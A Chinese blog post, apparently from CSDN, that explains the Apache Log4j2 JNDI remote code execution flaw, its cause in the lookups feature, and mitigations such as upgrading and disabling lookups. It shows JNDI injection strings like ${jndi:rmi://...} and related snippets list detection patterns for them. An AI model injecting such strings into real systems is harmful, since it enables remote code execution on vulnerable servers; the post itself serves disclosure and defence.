吃瓜之高危Apache Log4j 远程代码执行漏洞分析

最新推荐文章于 2024-06-18 16:45:09 发布
最新推荐文章于 2024-06-18 16:45:09 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: 网络攻击 文章标签: log4j 网络安全 远程漏洞 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/legendaryhaha/article/details/121876824
版权
本文介绍了Apache Log4j2.x版本的一个严重远程代码执行漏洞,详细解析了漏洞原理和利用方式。当Log4j的日志输出格式包含特定JNDI表达式时,可能导致黑客执行任意代码。解决方法包括升级到2.15.0-rc2版本,设置相关系统和JVM参数,以及禁用lookups功能。对于无法立即升级的情况,可通过修改参数缓解风险。高版本JDK可能提供一定防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

吃瓜之高危Apache Log4j 远程代码执行漏洞分析

前言

就在昨天,运维转发一条关于Apache Log4j 远程代码执行漏洞的公告,抱着吃瓜的心态,模拟复现了一波。

漏洞分析

根据公告内容,此次针对的是Apache Log4j 2.x < 2.15.0-rc2版本。公告指出,当我们以这种格式进行日志输出的时候,存在着被黑客攻击的风险。
在这里插入图片描述
如,当传入的name参数形如以下格式的时, Log4j 可以去执行这个地址对应的服务。

${jndi:rmi://127.0.0.1:7777/HelloService1}

在这里插入图片描述
利用这个漏洞,黑客可以在被攻击者的服务器上执行黑客自己的服务,从而达到攻击的目的。

原理

能实现如上的操作,首先得感谢log4j提供的 lookups功能。它允许通过 JNDI 的方式去检索变量,而 JNDI 又可以支持远程服务调用,间接造成了该漏洞。

关于JNDI,可以看看早些年写的一篇文章:JNDI

解决方式

  • 升级版本至 2.15.0-rc2
  • 修改jvm参数 -Dlog4j2.formatMsgNoLookups=true
  • 修改配置log4j2.formatMsgNoLookups=True
  • 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true

关于升级版本,有时可能一时半会不好下手,特别时那种间接依赖 Log4j的情况,譬如依赖某个服务Jar包,该服务包再去依赖 Log4j。可以通过修改参数缓解。

另外,笔者在测试的时候,高版本的JDK似乎也能防止这种情况出现,譬如JDK 8u271版本,在复现时,则是安全的。

了解 log4j远程代码执行漏洞
钉洲小懒猫的博客
12-15 1034
因为log4j辛苦修了一天代码,必须简单下这个~~ 输入${jndi:rmi://ip:port/obj}即可触发的漏洞,从修复方案看,升级log4j版本,或者临时方案如: 改配置文件 log4j2.formatMsgNoLookups=True 添加jvm启动参数 -Dlog4j2.formatMsgNoLookups=true 修改环境变量FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为true 接下来开始一步步简单 临时解决方案均是关闭lookup,
Apache Log4j2 远程代码执行漏洞 排查及修复
m0_48368237的博客
12-23 2015
近期,Apache Log4j2 远程代码执行漏洞(CNVD-2021- 95914)曝光,引发社会广泛关注。攻击者利用该漏洞,可 在未授权的情况下远程执行代码,获得服务器控制权限。经 中心综合技术分析研判,该漏洞具有危害程度高、利用难度 低、影响范围大的特点。 一、漏洞情况分析 Apache Log4j 是一个基于 Java 的日志记录组件。Apach e Log4j2 是 Log4j 的升级版本,通过重写 Log4j 引入了丰富 的功能特性。该日志组件被广泛应用于业务系统开发,用以 记录程序输入输出日志
Log4j远程代码执行漏洞
weilaona的博客
12-17 1100
Log4j远程代码执行漏洞 12 月 10 日凌晨,Apache 开源项目 Log4j远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。受本次漏洞影响的版本范围为 Apache Log4j 2.x < 2.15.0-rc2,攻击者可以利用此漏洞在目标服务器上执行任意代码,通过 JNDI 来执行 LDAP 协议来注入一些非法的可执行代码。 攻击检测 (1)可以通过检查日志中是否存在 “jndi:ldap://”、“jndi:rmi” 等字符来发现可能
Log4j远程代码执行漏洞
派大星的博客
09-21 2621
Log4j远程执行漏洞原理分析
Apache Log4j2(远程代码执行漏洞
F2444790591的博客
07-08 8198
1、下载、解压、重命名vulhub-master.zip为vulhub 2、进入漏洞环境下,启动该环境。 3、访问目标靶场: 4、在Dnslog.cn中生成接收信息的域名 。 5、提交dnslog payload 参数,进行访问。 6、可以发现dnslog接收到返回的信息,证明存在log4
网络安全Log4j 远程代码执行漏洞解析
程序员若风的博客
12-25 1280
log4j支持JNDI协议。Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中...
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
weixin_45715461的博客
06-28 4163
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
Apache Log4j 2.16.0远程代码执行漏洞紧急修复升级
在2021年12月初,一个安全研究者发现Log4j的一个功能存在设计上的缺陷,这个缺陷可以被攻击者利用,通过构造特殊格式的日志消息,触发远程代码执行漏洞,进而控制受影响的系统。此漏洞被编号为CVE-2021-44228,因其...
Apache Log4j远程代码执行漏洞 | 风险漏洞提示
技术杂谈
12-10 5365
开源网安研究院注意到,一个 Apache Log4j2 的高危漏洞细节被公开,攻击者利用漏洞可以远程执行代码。SourceCheck 产品对此次漏洞可以提供在线和离线升级包来对此协助筛查。
Log4j2 远程代码执行漏洞(CVE-2021-44228)
最新发布
qq_68163788的博客
06-18 1545
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228是Log4j2中存在的一个严重的远程代码执行漏洞。攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
日志框架Log4j
qq_21344887的博客
09-06 242
日志
Java框架安全篇--log4j2远程代码执行漏洞
m0_63138919的博客
04-06 1647
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主师傅大佬勿喷,还希望大家指出错误
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 3256
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
04-15 1412
LDAP 目录服务是由目录数据库和一套访问协议组成的系统,目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,我们可以理解为是一个为可以查询、浏览和搜索而优化的分布式数据库,它呈树状结构组织数据,简单点理解:就是有一个类似于字典的数据源,可以通过LDAP协议,lookup查询传一个name进去,就能获取到数据。RMI是Java中的一种远程方法调用机制,使用RMI,可以在不同的Java虚拟机(JVM)之间进行对象之间的方法调用。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
log4j2远程执行代码漏洞.md
lov3r的博客
08-27 957
文中漏洞Demo复现代码我上传到github,大家可以自行下载进行实验(本Demo只是为了复现问题,请不要用于其他非法用途)还有一点给大家的建议:在工作和学习的过程中不要认为网络上看到的东西就是正确的,对任何事物和问题我们要保持一颗怀疑的心,自己多动手...
Apache log4j远程代码执行漏洞复现
qq_46162550的博客
05-11 1938
Apache log4j远程代码执行漏洞复现(1) 漏洞原理:(2) 漏洞复现环境:(3) 漏洞复现过程: (1) 漏洞原理: Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入可执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏
Log4j远程代码执行漏洞环境搭建及复现
m0_71263989的博客
02-20 1950
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

legendaryhaha

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值